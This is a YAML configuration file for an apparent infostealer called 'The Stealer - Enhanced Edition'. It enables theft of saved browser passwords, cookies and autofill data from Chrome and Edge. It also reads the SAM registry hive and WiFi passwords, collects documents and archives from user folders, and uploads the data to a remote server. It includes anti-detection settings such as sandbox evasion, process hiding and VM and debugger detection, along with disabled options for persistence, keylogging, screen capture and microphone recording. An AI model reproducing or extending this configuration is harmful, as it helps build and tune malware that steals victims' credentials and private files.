# The Stealer - Enhanced Edition Configuration
# Advanced configuration file with comprehensive settings

application:
  name: "The Stealer - Enhanced Edition"
  version: "2.0.0"
  debug_mode: false
  log_level: "INFO"
  data_directory: "data"
  temp_directory: "temp"
  max_memory_usage: "2GB"
  auto_cleanup: true
  cleanup_interval: 3600  # seconds

security:
  encryption:
    algorithm: "AES-256-GCM"
    key_derivation: "PBKDF2"
    iterations: 100000
    salt_length: 32
    key_length: 32
    nonce_length: 12
    
  hashing:
    algorithm: "argon2"
    memory_cost: 65536
    time_cost: 3
    parallelism: 4
    
  anti_detection:
    process_hiding: true
    memory_protection: true
    debugger_detection: true
    sandbox_evasion: true
    vm_detection: true
    
  secure_deletion:
    enabled: true
    passes: 3
    overwrite_pattern: "random"
    
  key_management:
    key_rotation: true
    session_timeout: 3600
    max_key_age: 86400
    secure_storage: true

extraction:
  max_threads: 8
  timeout: 30
  chunk_size: 8192
  retry_attempts: 3
  batch_size: 100
  
  browsers:
    chrome:
      enabled: true
      profiles: ["Default", "Profile 1", "Profile 2"]
      data_types: ["passwords", "history", "bookmarks", "cookies", "autofill"]
      
    edge:
      enabled: true
      profiles: ["Default"]
      data_types: ["passwords", "history", "bookmarks", "cookies"]
      
    firefox:
      enabled: false
      profiles: ["default"]
      data_types: ["passwords", "history", "bookmarks"]
      
    safari:
      enabled: false
      data_types: ["passwords", "history"]
      
  system:
    processes:
      enabled: true
      include_details: true
      include_memory_info: true
      include_cpu_info: true
      
    network:
      enabled: true
      interfaces: true
      connections: true
      routes: true
      dns_cache: true
      
    registry:
      enabled: true
      hives: ["HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER"]
      keys: ["SOFTWARE", "SYSTEM", "SAM"]
      
    services:
      enabled: true
      include_drivers: true
      include_scheduled_tasks: true
      
    wifi:
      enabled: true
      profiles: true
      passwords: true
      
  files:
    documents:
      enabled: true
      extensions: [".pdf", ".doc", ".docx", ".txt", ".rtf", ".odt", ".xls", ".xlsx", ".ppt", ".pptx"]
      max_size: "100MB"
      search_paths: ["Documents", "Desktop", "Downloads"]
      
    images:
      enabled: false
      extensions: [".jpg", ".jpeg", ".png", ".gif", ".bmp", ".tiff", ".webp"]
      max_size: "50MB"
      
    archives:
      enabled: true
      extensions: [".zip", ".rar", ".7z", ".tar", ".gz", ".bz2"]
      max_size: "500MB"
      
    executables:
      enabled: false
      extensions: [".exe", ".msi", ".dll", ".sys"]
      max_size: "1GB"

communication:
  server_url: ""
  api_key: ""
  timeout: 30
  retry_attempts: 3
  verify_ssl: true
  encryption_enabled: true
  compression_enabled: true
  
  protocols:
    http: true
    https: true
    websocket: true
    
  authentication:
    method: "bearer_token"
    token_refresh: true
    refresh_interval: 3600
    
  data_transmission:
    chunk_size: 1024
    max_file_size: "1GB"
    parallel_uploads: 3
    resume_support: true

gui:
  theme: "dark"
  window_size: "1200x800"
  auto_save: true
  show_debug_info: false
  
  colors:
    background: "#2b2b2b"
    foreground: "#ffffff"
    accent: "#007acc"
    success: "#00ff00"
    error: "#ff0000"
    warning: "#ffff00"
    
  fonts:
    default: "Arial"
    monospace: "Consolas"
    size: 10

logging:
  level: "INFO"
  file_rotation: true
  max_file_size: "10MB"
  backup_count: 5
  
  handlers:
    file:
      enabled: true
      filename: "logs/stealer.log"
      format: "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
      
    console:
      enabled: true
      format: "%(levelname)s - %(message)s"
      
    syslog:
      enabled: false
      address: "localhost"
      facility: "local0"

performance:
  memory_limit: "2GB"
  cpu_limit: 80  # percentage
  disk_limit: "10GB"
  
  optimization:
    lazy_loading: true
    caching: true
    compression: true
    parallel_processing: true
    
  monitoring:
    enabled: true
    interval: 60  # seconds
    alert_threshold: 90  # percentage

advanced:
  stealth_mode:
    enabled: false
    hide_process: true
    hide_files: true
    anti_debug: true
    
  persistence:
    enabled: false
    methods: ["registry", "service", "scheduled_task"]
    
  keylogger:
    enabled: false
    capture_window: true
    capture_clipboard: true
    
  screen_capture:
    enabled: false
    interval: 60  # seconds
    quality: 80  # percentage
    
  microphone:
    enabled: false
    duration: 30  # seconds
    quality: "high"

development:
  debug_mode: false
  profiling: false
  test_mode: false
  
  features:
    experimental: false
    beta_features: false
    developer_tools: false
    
  api:
    enabled: false
    port: 8080
    authentication: true
    rate_limiting: true